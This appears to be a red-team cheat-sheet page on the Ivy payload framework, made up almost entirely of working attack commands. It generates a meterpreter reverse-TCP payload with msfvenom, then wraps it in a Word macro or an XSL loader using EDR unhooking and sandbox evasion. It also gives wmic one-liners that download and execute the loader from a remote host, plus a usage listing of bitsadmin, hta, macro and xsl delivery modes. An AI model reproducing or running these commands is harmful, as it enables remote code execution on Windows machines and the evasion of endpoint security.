search

Ivy

Payload Framework

https://github.com/optiv/Ivy

Generate Payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o msf.bin LHOST=172.16.245.16 LPORT=4444

Convert to Word Macro:

./Ivy -stageless -Ix64 msf.bin -delivery macro -product Word -unhook -P Local -O ivymsf.txt

Convert to Excel File

./Ivy -Ix64 msf.bin -P Local -O Ivy.xsl -url http://salesforce.vmoshpit-lab.com -delivery xsl -stageless

  • One liner command to execute it:

wmic computersystem list full /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"
wmic computersystem list brief /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"
wmic process list brief /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"

Usage of ./Ivy: -Ix64 string Path to the x64 payload -Ix86 string Path to the x86 payload -O string Name of output file -P string Payload type "Inject" (Which performs a process injection) or "Local" (Which loads the payload directly into the current process) -debug Print debug statements -delivery string Generates an one-liner command to download and execute the payload remotely: [] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader. [] hta - Generates a blank hta file containing the loader along with a one liner command execute the loader remotely. [] macro - Generates an office macro that would download and execute a the loader remotely. [] xsl - Generates a xsl stylesheet file containing the loader along with a one liner command execute the loader remotely. -process32 string The full path to the x86 application to spawn. Only use applications that are found in System32 & SYSWOW64 (default is rundll32.exe) -process64 string The full path to the x64 application to spawn. Please specify the path to the process to create/inject into (use \ for the path) (default is explorer.exe) -product string Name of the office product to use (Excel, Word, PowerPoint) (default "Excel") -sandbox Enable sandbox evasion controls (i.e. checks if the system is domain joined) -stageless Enables stageless payload. When this option is enabled use a raw payload (aka .bin files) instead of .c code -unhook Unhooks EDR's hooks before loading payload -url string URL assoicated with the Delivery option to retrieve the payload. (e.g https://acme.com/)

PreviousReverse ShellsNextMeterpreter